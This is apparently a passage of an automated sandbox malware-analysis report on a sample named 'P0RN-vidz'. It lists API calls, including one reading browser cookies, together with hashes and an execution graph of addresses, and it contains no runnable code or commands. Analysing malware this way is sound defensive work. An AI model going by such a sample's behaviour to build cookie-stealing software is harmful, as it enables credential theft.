                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                                          • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                          • Opcode ID: f20a32442fdc6f13185d217523cc1c4a797b7a2d8a6862d83cccafef3d5ede3d
                                                                                                                                                                                                                                          • Instruction ID: 2730131792847e07168471eff742fdce13ca4c0d53188a6fa70d7b667eadc7f6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f20a32442fdc6f13185d217523cc1c4a797b7a2d8a6862d83cccafef3d5ede3d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2E04F30280304FBEF322B70EC8AF5A7F68AB10B52F108424F90DA81E2D765E8949584
                                                                                                                                                                                                                                          Function 0037592D Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,003758D4,00000000,00000000,00000000,00000000,?,00375AD1,00000006,FlsSetValue), ref: 0037595F
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,003758D4,00000000,00000000,00000000,00000000,?,00375AD1,00000006,FlsSetValue,0037C4D8,FlsSetValue,00000000,00000364,?,00374646), ref: 0037596B
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,003758D4,00000000,00000000,00000000,00000000,?,00375AD1,00000006,FlsSetValue,0037C4D8,FlsSetValue,00000000), ref: 00375979
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                                                                                          • Opcode ID: 3689092c2c80f4f800b252fd36a539314a6e8977a21ba6d80360599cd2b97eff
                                                                                                                                                                                                                                          • Instruction ID: 32220fc5bc5ba97ef8989489d4c212340e0c17dc070cc35b0609544379f88882
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3689092c2c80f4f800b252fd36a539314a6e8977a21ba6d80360599cd2b97eff
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2701FC32615622EFCB374B68DC88B57B76C9F46771B214524FA1DD7140D764D844C6E0
                                                                                                                                                                                                                                          Function 00374A0B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00374B77
                                                                                                                                                                                                                                            • Part of subcall function 0037489D: IsProcessorFeaturePresent.KERNEL32(00000017,0037488C,00000000,?,00000004,00000000,?,?,?,?,00374899,00000000,00000000,00000000,00000000,00000000), ref: 0037489F
                                                                                                                                                                                                                                            • Part of subcall function 0037489D: GetCurrentProcess.KERNEL32(C0000417), ref: 003748C1
                                                                                                                                                                                                                                            • Part of subcall function 0037489D: TerminateProcess.KERNEL32(00000000), ref: 003748C8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                                                                          • String ID: *?$.
                                                                                                                                                                                                                                          • API String ID: 2667617558-3972193922
                                                                                                                                                                                                                                          • Opcode ID: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                                                          • Instruction ID: aaff06797963dbbb5fdb29d9dcd4127590ed518678cdcc45abc931a115860667
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB51B475E00109AFDF26CFA8C881AADB7F9EF48314F258169E458E7301E739AE01CB50

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:16.7%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                          Total number of Nodes:516
                                                                                                                                                                                                                                          Total number of Limit Nodes:64
                                                                                                                                                                                                                                          execution_graph 44852 7ff848ead870 44853 7ff848e715f8 LoadLibraryExW 44852->44853 44854 7ff848ead8c7 44853->44854 44661 7ff848eb2eb1 44662 7ff848eb2ecf 44661->44662 44665 7ff848eb2f97 44662->44665 44666 7ff848e74c90 LoadLibraryExW 44662->44666 44664 7ff848eb3087 44667 7ff848eb2fe7 44665->44667 44668 7ff848eb3074 44665->44668 44674 7ff848eb30d0 44665->44674 44666->44665 44682 7ff848e760be LoadLibraryExW 44667->44682 44669 7ff848eb307a 44668->44669 44668->44674 44671 7ff848e76110 2 API calls 44669->44671 44671->44664 44672 7ff848eb2ff4 44672->44664 44683 7ff848e760be LoadLibraryExW 44672->44683 44678 7ff848e76110 44674->44678 44675 7ff848eb3005 44676 7ff848e74c90 LoadLibraryExW 44675->44676 44677 7ff848eb306b 44676->44677 44679 7ff848eb6230 44678->44679 44684 7ff848eb4cb8 44679->44684 44681 7ff848eb6289 44681->44664 44682->44672 44683->44675 44685 7ff848eb7a30 44684->44685 44694 7ff848e71548 44685->44694 44687 7ff848eb7a6e 44699 7ff848e853d0 44687->44699 44689 7ff848eb7b25 44702 7ff848e77de0 44689->44702 44691 7ff848eb7b37 44692 7ff848e74c90 LoadLibraryExW 44691->44692 44693 7ff848eb7b70 44692->44693 44693->44681 44695 7ff848e71551 44694->44695 44696 7ff848e71683 44695->44696 44697 7ff848e71802 LoadLibraryExW 44695->44697 44696->44687 44698 7ff848e71836 44697->44698 44698->44687 44700 7ff848e77de0 LoadLibraryExW 44699->44700 44701 7ff848e853e3 44700->44701 44701->44689 44703 7ff848e77dfd 44702->44703 44704 7ff848e77e5b 44703->44704 44706 7ff848e76bf0 44703->44706 44704->44691 44707 7ff848e76bf9 44706->44707 44708 7ff848e76d2d 44707->44708 44709 7ff848e76cdb 44707->44709 44710 7ff848e76d82 44708->44710 44711 7ff848e76d31 44708->44711 44712 7ff848e74c90 LoadLibraryExW 44709->44712 44713 7ff848e74c90 LoadLibraryExW 44710->44713 44714 7ff848e74c90 LoadLibraryExW 44711->44714 44717 7ff848e76cf5 44712->44717 44715 7ff848e76d9f 44713->44715 44714->44717 44716 7ff848e74c90 LoadLibraryExW 44715->44716 44718 7ff848e76db9 44716->44718 44719 7ff848e74c90 LoadLibraryExW 44717->44719 44726 7ff848e76d28 44717->44726 44720 7ff848e76f00 44718->44720 44723 7ff848e74c90 LoadLibraryExW 44718->44723 44724 7ff848e77077 44719->44724 44730 7ff848e75990 44720->44730 44722 7ff848e76f40 44725 7ff848e74c90 LoadLibraryExW 44722->44725 44723->44720 44727 7ff848e75990 LoadLibraryExW 44724->44727 44725->44717 44726->44704 44728 7ff848e770af 44727->44728 44729 7ff848e74c90 LoadLibraryExW 44728->44729 44729->44726 44731 7ff848e73f30 LoadLibraryExW 44730->44731 44732 7ff848e759b4 44731->44732 44732->44722 44979 7ff848ea8336 44980 7ff848ea834f 44979->44980 44981 7ff848e773d0 LoadLibraryExW 44980->44981 44982 7ff848ea8390 44981->44982 44983 7ff848e74c90 LoadLibraryExW 44982->44983 44986 7ff848ea847c 44982->44986 44984 7ff848ea841d 44983->44984 44985 7ff848e74c90 LoadLibraryExW 44984->44985 44984->44986 44985->44986 44733 7ff848eb2fb5 44735 7ff848eb2fb8 44733->44735 44734 7ff848e76110 2 API calls 44745 7ff848eb3087 44734->44745 44736 7ff848eb2fe7 44735->44736 44737 7ff848eb3074 44735->44737 44743 7ff848eb30d0 44735->44743 44748 7ff848e760be LoadLibraryExW 44736->44748 44738 7ff848eb307a 44737->44738 44737->44743 44740 7ff848e76110 2 API calls 44738->44740 44740->44745 44741 7ff848eb2ff4 44741->44745 44749 7ff848e760be LoadLibraryExW 44741->44749 44743->44734 44744 7ff848eb3005 44746 7ff848e74c90 LoadLibraryExW 44744->44746 44747 7ff848eb306b 44746->44747 44748->44741 44749->44744 44987 7ff848e73d36 44988 7ff848e73d3d 44987->44988 44989 7ff848e72e48 LoadLibraryExW 44988->44989 44990 7ff848e73e2a 44989->44990 44993 7ff848e72e20 44990->44993 44995 7ff848e72e25 44993->44995 44994 7ff848e72e59 44995->44994 44996 7ff848e72e08 LoadLibraryExW 44995->44996 44998 7ff848e73e8a 44995->44998 44996->44998 44997 7ff848e73e4c 44998->44997 44999 7ff848e72e30 LoadLibraryExW 44998->44999 44999->44997 44855 7ff848e74b75 44856 7ff848e74b7f 44855->44856 44857 7ff848e73f30 LoadLibraryExW 44856->44857 44858 7ff848e74bad 44857->44858 44859 7ff848eb9261 44860 7ff848eb927f 44859->44860 44861 7ff848eb935f 44860->44861 44864 7ff848eb952a 44860->44864 44867 7ff848eb936f 44860->44867 44873 7ff848e90b10 LoadLibraryExW 44861->44873 44866 7ff848eb936a 44866->44864 44869 7ff848e7a7c8 44866->44869 44867->44866 44874 7ff848e90b10 LoadLibraryExW 44867->44874 44871 7ff848eb9e30 44869->44871 44870 7ff848eb951e 44871->44870 44872 7ff848ea7290 LoadLibraryExW 44871->44872 44872->44871 44873->44866 44874->44866 45000 7ff848ea1e22 45001 7ff848ea1e4f 45000->45001 45002 7ff848ea205e 45001->45002 45003 7ff848e87700 LoadLibraryExW 45001->45003 45004 7ff848ea1eb2 45001->45004 45003->45004 45004->45002 45005 7ff848e87700 LoadLibraryExW 45004->45005 45008 7ff848ea1eed 45004->45008 45005->45008 45006 7ff848ea1f4a 45009 7ff848e87700 LoadLibraryExW 45006->45009 45013 7ff848ea1f5e 45006->45013 45007 7ff848ea1f25 45007->45006 45011 7ff848ea1f78 45007->45011 45008->45006 45008->45007 45010 7ff848e87700 LoadLibraryExW 45008->45010 45009->45013 45010->45007 45011->45013 45015 7ff848e87700 LoadLibraryExW 45011->45015 45012 7ff848e74c90 LoadLibraryExW 45014 7ff848ea1fe7 45012->45014 45013->45012 45016 7ff848e74c90 LoadLibraryExW 45014->45016 45015->45013 45017 7ff848ea200f 45016->45017 45018 7ff848e74c90 LoadLibraryExW 45017->45018 45019 7ff848ea2042 45018->45019 45019->45002 45020 7ff848e773d0 LoadLibraryExW 45019->45020 45021 7ff848ea2251 45020->45021 45022 7ff848e75990 LoadLibraryExW 45021->45022 45023 7ff848ea2276 45022->45023 45024 7ff848e75990 LoadLibraryExW 45023->45024 45025 7ff848ea22fb 45024->45025 44750 7ff848ea8ca6 44751 7ff848ea8cb3 44750->44751 44753 7ff848ea8d94 44751->44753 44768 7ff848e87700 44751->44768 44754 7ff848e773d0 LoadLibraryExW 44753->44754 44755 7ff848ea8e00 44754->44755 44756 7ff848ea8e14 44755->44756 44757 7ff848e87700 LoadLibraryExW 44755->44757 44758 7ff848e87700 LoadLibraryExW 44756->44758 44759 7ff848ea8e45 44756->44759 44757->44756 44758->44759 44760 7ff848e87700 LoadLibraryExW 44759->44760 44762 7ff848ea8e96 44759->44762 44760->44762 44761 7ff848e74c90 LoadLibraryExW 44763 7ff848ea8ee0 44761->44763 44762->44761 44764 7ff848e74c90 LoadLibraryExW 44763->44764 44765 7ff848ea8f13 44764->44765 44766 7ff848e74c90 LoadLibraryExW 44765->44766 44767 7ff848ea8f43 44765->44767 44766->44767 44769 7ff848e87728 44768->44769 44774 7ff848e78fd0 44769->44774 44771 7ff848e87736 44772 7ff848e76978 LoadLibraryExW 44771->44772 44773 7ff848e87749 44772->44773 44773->44753 44775 7ff848e77de0 LoadLibraryExW 44774->44775 44776 7ff848e78fe7 44775->44776 45030 7ff848e7bf19 45031 7ff848e7bf2f 45030->45031 45033 7ff848e74c90 LoadLibraryExW 45031->45033 45034 7ff848e7c086 45031->45034 45036 7ff848e7bfe6 45033->45036 45035 7ff848e7c12e 45034->45035 45038 7ff848e7a728 45034->45038 45037 7ff848e74c90 LoadLibraryExW 45036->45037 45037->45034 45039 7ff848e7c710 45038->45039 45040 7ff848e773d0 LoadLibraryExW 45039->45040 45041 7ff848e7c74b 45040->45041 45042 7ff848e74c90 LoadLibraryExW 45041->45042 45043 7ff848e7c7a3 45042->45043 45048 7ff848e7a720 45043->45048 45045 7ff848e7c7b4 45046 7ff848e74c90 LoadLibraryExW 45045->45046 45047 7ff848e7c7c2 45045->45047 45046->45047 45047->45034 45049 7ff848e7d350 45048->45049 45050 7ff848e7d460 45049->45050 45051 7ff848e7d3cc 45049->45051 45052 7ff848e74c90 LoadLibraryExW 45050->45052 45055 7ff848e7d449 45050->45055 45053 7ff848e74c90 LoadLibraryExW 45051->45053 45052->45055 45053->45055 45054 7ff848e7d62c 45054->45045 45055->45054 45056 7ff848e7d5db 45055->45056 45057 7ff848e74c90 LoadLibraryExW 45055->45057 45058 7ff848e74c90 LoadLibraryExW 45056->45058 45057->45056 45058->45054 44777 7ff848eaaba5 44778 7ff848eaab60 44777->44778 44778->44777 44779 7ff848e773d0 LoadLibraryExW 44778->44779 44781 7ff848eaac9b 44779->44781 44780 7ff848eaaf32 44781->44780 44793 7ff848e758a0 LoadLibraryExW 44781->44793 44783 7ff848eab0bb 44788 7ff848e71608 44783->44788 44785 7ff848eab0f2 44787 7ff848eab303 44785->44787 44794 7ff848e758a0 LoadLibraryExW 44785->44794 44789 7ff848e71611 44788->44789 44790 7ff848e71683 44789->44790 44791 7ff848e71802 LoadLibraryExW 44789->44791 44790->44785 44792 7ff848e71836 44791->44792 44792->44785 44793->44783 44794->44785 44506 7ff848eba6da 44507 7ff848eba6e7 44506->44507 44516 7ff848e773d0 44507->44516 44509 7ff848eba73a 44510 7ff848eba826 44509->44510 44511 7ff848eba7dd 44509->44511 44515 7ff848eba893 44510->44515 44526 7ff848e76158 LoadLibraryExW 44510->44526 44521 7ff848e74c90 44511->44521 44513 7ff848eba817 44517 7ff848e773ff 44516->44517 44518 7ff848e773f6 44516->44518 44527 7ff848e73f30 44517->44527 44518->44509 44520 7ff848e77404 44520->44509 44522 7ff848e74cb8 44521->44522 44523 7ff848e74cc3 44521->44523 44522->44513 44524 7ff848e73f30 LoadLibraryExW 44523->44524 44525 7ff848e74cc8 44524->44525 44525->44513 44526->44515 44530 7ff848e715c8 44527->44530 44529 7ff848e73f55 44529->44520 44532 7ff848e71586 44530->44532 44531 7ff848e71683 44531->44529 44532->44531 44533 7ff848e71802 LoadLibraryExW 44532->44533 44534 7ff848e71836 44533->44534 44534->44529 44878 7ff848eb645f 44880 7ff848eb63c3 44878->44880 44879 7ff848eb64c1 44880->44879 44881 7ff848e77de0 LoadLibraryExW 44880->44881 44882 7ff848eb6407 44881->44882 44535 7ff848eba5d3 44537 7ff848eba5dd 44535->44537 44536 7ff848eba624 44537->44536 44539 7ff848e76148 44537->44539 44540 7ff848e7614d 44539->44540 44541 7ff848e761b1 44540->44541 44544 7ff848e8e8a0 44540->44544 44543 7ff848ea59b4 44543->44536 44546 7ff848e8e8d2 44544->44546 44545 7ff848e8ea04 44545->44543 44546->44545 44547 7ff848e74c90 LoadLibraryExW 44546->44547 44548 7ff848e8ebff 44547->44548 44883 7ff848ea2451 44884 7ff848ea245b 44883->44884 44885 7ff848e773d0 LoadLibraryExW 44884->44885 44886 7ff848ea24c6 44885->44886 44887 7ff848e74c90 LoadLibraryExW 44886->44887 44888 7ff848ea250e 44887->44888 44889 7ff848e75990 LoadLibraryExW 44888->44889 44891 7ff848ea2db4 44888->44891 44890 7ff848ea260b 44889->44890 44892 7ff848e74c90 LoadLibraryExW 44890->44892 44893 7ff848ea2625 44892->44893 44894 7ff848e74c90 LoadLibraryExW 44893->44894 44895 7ff848ea2701 44894->44895 44895->44891 44896 7ff848ea271d 44895->44896 44897 7ff848ea275d 44895->44897 44898 7ff848e74c90 LoadLibraryExW 44896->44898 44897->44891 44899 7ff848e87700 LoadLibraryExW 44897->44899 44900 7ff848ea2790 44897->44900 44911 7ff848ea2737 44898->44911 44899->44900 44900->44911 44921 7ff848e733d8 44900->44921 44902 7ff848ea27c5 44903 7ff848e733d8 LoadLibraryExW 44902->44903 44902->44911 44904 7ff848ea2813 44903->44904 44905 7ff848e74c90 LoadLibraryExW 44904->44905 44906 7ff848ea283b 44905->44906 44908 7ff848e74c90 LoadLibraryExW 44906->44908 44907 7ff848e74c90 LoadLibraryExW 44912 7ff848ea2923 44907->44912 44909 7ff848ea2855 44908->44909 44910 7ff848e87700 LoadLibraryExW 44909->44910 44909->44911 44910->44911 44911->44907 44912->44891 44913 7ff848e75990 LoadLibraryExW 44912->44913 44914 7ff848ea2987 44913->44914 44915 7ff848e74c90 LoadLibraryExW 44914->44915 44916 7ff848ea29a1 44915->44916 44917 7ff848e74c90 LoadLibraryExW 44916->44917 44919 7ff848ea29bb 44917->44919 44918 7ff848ea2d76 44919->44918 44920 7ff848e75990 LoadLibraryExW 44919->44920 44920->44918 44925 7ff848e733dd 44921->44925 44922 7ff848e73774 44933 7ff848e73c81 44922->44933 44924 7ff848e7378e 44924->44902 44925->44922 44929 7ff848e72f80 44925->44929 44927 7ff848e7370a 44928 7ff848e72f80 LoadLibraryExW 44927->44928 44928->44922 44930 7ff848e758a0 44929->44930 44937 7ff848e72f00 44930->44937 44932 7ff848e75929 44932->44927 44934 7ff848e73cae 44933->44934 44941 7ff848e72e48 44934->44941 44936 7ff848e73d19 44936->44924 44938 7ff848e75990 44937->44938 44939 7ff848e73f30 LoadLibraryExW 44938->44939 44940 7ff848e759b4 44939->44940 44940->44932 44942 7ff848e73e70 44941->44942 44945 7ff848e73e8a 44942->44945 44947 7ff848e72e08 44942->44947 44944 7ff848e73ec9 44944->44936 44945->44944 44951 7ff848e72e30 44945->44951 44948 7ff848e73f30 44947->44948 44949 7ff848e715c8 LoadLibraryExW 44948->44949 44950 7ff848e73f55 44949->44950 44950->44945 44953 7ff848e72e35 44951->44953 44952 7ff848e72e59 44953->44952 44954 7ff848e72e08 LoadLibraryExW 44953->44954 44956 7ff848e73e8a 44953->44956 44954->44956 44955 7ff848e73ec9 44955->44944 44956->44955 44957 7ff848e72e30 LoadLibraryExW 44956->44957 44957->44955 44958 7ff848e7a84f 44959 7ff848e7a882 44958->44959 44960 7ff848e773d0 LoadLibraryExW 44959->44960 44961 7ff848e7a897 44960->44961 44962 7ff848e74c90 LoadLibraryExW 44961->44962 44963 7ff848e7aa63 44962->44963 44964 7ff848e7aa6e 44963->44964 44965 7ff848e7abd4 44963->44965 44968 7ff848e7ab44 44964->44968 44970 7ff848e7ab6d 44964->44970 44966 7ff848e74c90 LoadLibraryExW 44965->44966 44967 7ff848e7ab68 44966->44967 44969 7ff848e74c90 LoadLibraryExW 44967->44969 44968->44967 44971 7ff848e74c90 LoadLibraryExW 44968->44971 44974 7ff848e7ac08 44969->44974 44972 7ff848e74c90 LoadLibraryExW 44970->44972 44971->44967 44973 7ff848e7ab87 44972->44973 44975 7ff848e7994b 44976 7ff848e79945 44975->44976 44976->44975 44977 7ff848e79a0e CreateFileW 44976->44977 44978 7ff848e79a8c 44977->44978 45059 7ff848e8e315 45060 7ff848e8e31f 45059->45060 45065 7ff848e76168 45060->45065 45062 7ff848e8e354 45064 7ff848e8e392 45062->45064 45069 7ff848e7a788 45062->45069 45066 7ff848e7616d 45065->45066 45067 7ff848e8e8a0 LoadLibraryExW 45066->45067 45068 7ff848ea59b4 45067->45068 45068->45062 45071 7ff848e7a78d 45069->45071 45070 7ff848eb9ec5 45070->45064 45071->45070 45072 7ff848ea7290 LoadLibraryExW 45071->45072 45072->45071 44549 7ff848e7a0d5 44550 7ff848e7a0ff 44549->44550 44551 7ff848e773d0 LoadLibraryExW 44550->44551 44552 7ff848e7a11a 44550->44552 44553 7ff848e7a23a 44551->44553 44554 7ff848ea31cd 44555 7ff848ea31d5 44554->44555 44556 7ff848ea324a 44555->44556 44562 7ff848ea3434 44555->44562 44557 7ff848e773d0 LoadLibraryExW 44556->44557 44558 7ff848ea32bf 44557->44558 44575 7ff848e7b540 44558->44575 44560 7ff848ea32da 44579 7ff848e88a10 44560->44579 44563 7ff848e74c90 LoadLibraryExW 44562->44563 44570 7ff848ea34cc 44563->44570 44564 7ff848ea32e7 44565 7ff848ea3386 44564->44565 44564->44570 44567 7ff848ea339c 44565->44567 44599 7ff848e7a770 44565->44599 44568 7ff848e74c90 LoadLibraryExW 44567->44568 44569 7ff848ea33c4 44567->44569 44568->44569 44573 7ff848ea37ef 44570->44573 44603 7ff848e8b0a0 44570->44603 44574 7ff848ea3bb2 44573->44574 44608 7ff848e76180 44573->44608 44576 7ff848e7b565 44575->44576 44577 7ff848e773d0 LoadLibraryExW 44576->44577 44578 7ff848e7b57a 44577->44578 44578->44560 44580 7ff848e88a3d 44579->44580 44581 7ff848e773d0 LoadLibraryExW 44580->44581 44582 7ff848e88a82 44581->44582 44583 7ff848e74c90 LoadLibraryExW 44582->44583 44596 7ff848e88c6c 44582->44596 44584 7ff848e88b86 44583->44584 44585 7ff848e74c90 LoadLibraryExW 44584->44585 44587 7ff848e88bc2 44585->44587 44586 7ff848e88bdd 44591 7ff848e74c90 LoadLibraryExW 44586->44591 44587->44586 44588 7ff848e88bdf 44587->44588 44589 7ff848e88bcf 44587->44589 44618 7ff848e76140 44588->44618 44589->44586 44613 7ff848e76138 44589->44613 44594 7ff848e88c02 44591->44594 44593 7ff848e88c23 44595 7ff848e74c90 LoadLibraryExW 44593->44595 44594->44593 44623 7ff848e76128 44594->44623 44598 7ff848e88c3d 44595->44598 44596->44564 44598->44564 44600 7ff848e7a775 44599->44600 44601 7ff848eb9ec5 44600->44601 44628 7ff848ea7290 44600->44628 44601->44567 44605 7ff848e8b0d2 44603->44605 44604 7ff848e8b23e 44604->44573 44605->44604 44606 7ff848e74c90 LoadLibraryExW 44605->44606 44607 7ff848e8b42a 44606->44607 44610 7ff848ea56e0 44608->44610 44609 7ff848ea572a 44609->44573 44610->44609 44611 7ff848e8e8a0 LoadLibraryExW 44610->44611 44612 7ff848ea59b4 44611->44612 44612->44573 44614 7ff848e7612e 44613->44614 44614->44613 44615 7ff848e761b1 44614->44615 44616 7ff848e8e8a0 LoadLibraryExW 44614->44616 44617 7ff848ea59b4 44616->44617 44617->44586 44619 7ff848e7612e 44618->44619 44620 7ff848e761b1 44619->44620 44621 7ff848e8e8a0 LoadLibraryExW 44619->44621 44622 7ff848ea59b4 44621->44622 44622->44586 44625 7ff848e90b10 44623->44625 44624 7ff848e90c11 44625->44624 44626 7ff848e74c90 LoadLibraryExW 44625->44626 44627 7ff848e90bfd 44626->44627 44627->44593 44629 7ff848ea72b5 44628->44629 44630 7ff848ea73cd 44629->44630 44632 7ff848e7a778 44629->44632 44630->44600 44633 7ff848ea7510 44632->44633 44634 7ff848e74c90 LoadLibraryExW 44633->44634 44635 7ff848ea758c 44633->44635 44634->44635 44635->44629 44636 7ff848e7e8d2 44637 7ff848e7e8ff InternetGetCookieW 44636->44637 44639 7ff848e7eac9 44637->44639 44640 7ff848ea3bc3 44642 7ff848ea3bc8 44640->44642 44643 7ff848ea3e18 44642->44643 44644 7ff848e76178 44642->44644 44645 7ff848ea59a0 44644->44645 44646 7ff848e8e8a0 LoadLibraryExW 44645->44646 44647 7ff848ea59b4 44646->44647 44647->44642 44795 7ff848ea1583 44796 7ff848ea158e 44795->44796 44798 7ff848ea159c 44795->44798 44797 7ff848e773d0 LoadLibraryExW 44796->44797 44797->44798 44799 7ff848ea15db 44798->44799 44801 7ff848ea163c 44798->44801 44800 7ff848e74c90 LoadLibraryExW 44799->44800 44806 7ff848ea1631 44800->44806 44803 7ff848e74c90 LoadLibraryExW 44801->44803 44802 7ff848ea1a00 44808 7ff848ea1692 44803->44808 44804 7ff848e74c90 LoadLibraryExW 44804->44802 44805 7ff848ea1a14 44807 7ff848e74c90 LoadLibraryExW 44806->44807 44814 7ff848ea19c4 44806->44814 44812 7ff848ea187e 44807->44812 44808->44805 44808->44806 44809 7ff848e74c90 LoadLibraryExW 44808->44809 44810 7ff848ea1787 44809->44810 44810->44806 44811 7ff848e74c90 LoadLibraryExW 44810->44811 44811->44806 44812->44805 44813 7ff848e74c90 LoadLibraryExW 44812->44813 44812->44814 44813->44814 44814->44802 44814->44804 45073 7ff848eba901 45074 7ff848eba924 45073->45074 45075 7ff848eba971 45074->45075 45077 7ff848e76158 LoadLibraryExW 45074->45077 45077->45075 44815 7ff848eb0385 44816 7ff848eb039f 44815->44816 44817 7ff848e773d0 LoadLibraryExW 44816->44817 44818 7ff848eb03ee 44817->44818 44819 7ff848e74c90 LoadLibraryExW 44818->44819 44820 7ff848eb0418 44819->44820 44821 7ff848e74c90 LoadLibraryExW 44820->44821 44822 7ff848eb0442 44821->44822 44823 7ff848e74c90 LoadLibraryExW 44822->44823 44824 7ff848eb046c 44823->44824 44825 7ff848e74c90 LoadLibraryExW 44824->44825 44826 7ff848eb0496 44825->44826 44829 7ff848e7a768 44826->44829 44828 7ff848eb0582 44830 7ff848e7a76d 44829->44830 44831 7ff848eb9ec5 44830->44831 44832 7ff848ea7290 LoadLibraryExW 44830->44832 44831->44828 44832->44830 44833 7ff848ea4886 44835 7ff848ea39e5 44833->44835 44834 7ff848e76180 LoadLibraryExW 44834->44835 44835->44834 44836 7ff848ea3bb2 44835->44836 44652 7ff848eacaba 44653 7ff848eacabf 44652->44653 44656 7ff848e715f8 44653->44656 44655 7ff848eacb3b 44658 7ff848e71601 44656->44658 44657 7ff848e71683 44657->44655 44658->44657 44659 7ff848e71802 LoadLibraryExW 44658->44659 44660 7ff848e71836 44659->44660 44660->44655 44837 7ff848e89d7d 44838 7ff848e89d8f 44837->44838 44841 7ff848e89dbb 44838->44841 44843 7ff848e76160 44838->44843 44840 7ff848e8a147 44841->44840 44848 7ff848e76170 44841->44848 44845 7ff848e76165 44843->44845 44844 7ff848e761b9 44845->44844 44846 7ff848e8e8a0 LoadLibraryExW 44845->44846 44847 7ff848ea59b4 44846->44847 44847->44841 44849 7ff848e76175 44848->44849 44850 7ff848e8e8a0 LoadLibraryExW 44849->44850 44851 7ff848ea59b4 44850->44851 44851->44840 45078 7ff848eb5eff 45079 7ff848eb5f09 45078->45079 45081 7ff848eb5f80 45079->45081 45082 7ff848eb1808 45079->45082 45084 7ff848eb180d 45082->45084 45083 7ff848eb18c0 45083->45081 45084->45083 45087 7ff848eb19d2 45084->45087 45089 7ff848ea6e90 45084->45089 45086 7ff848eb1a34 45086->45081 45087->45086 45092 7ff848eb2137 LoadLibraryExW 45087->45092 45090 7ff848e77de0 LoadLibraryExW 45089->45090 45091 7ff848ea6ea5 45090->45091 45091->45087 45092->45086

                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                          Function 00007FF848E71608 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 274libraryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
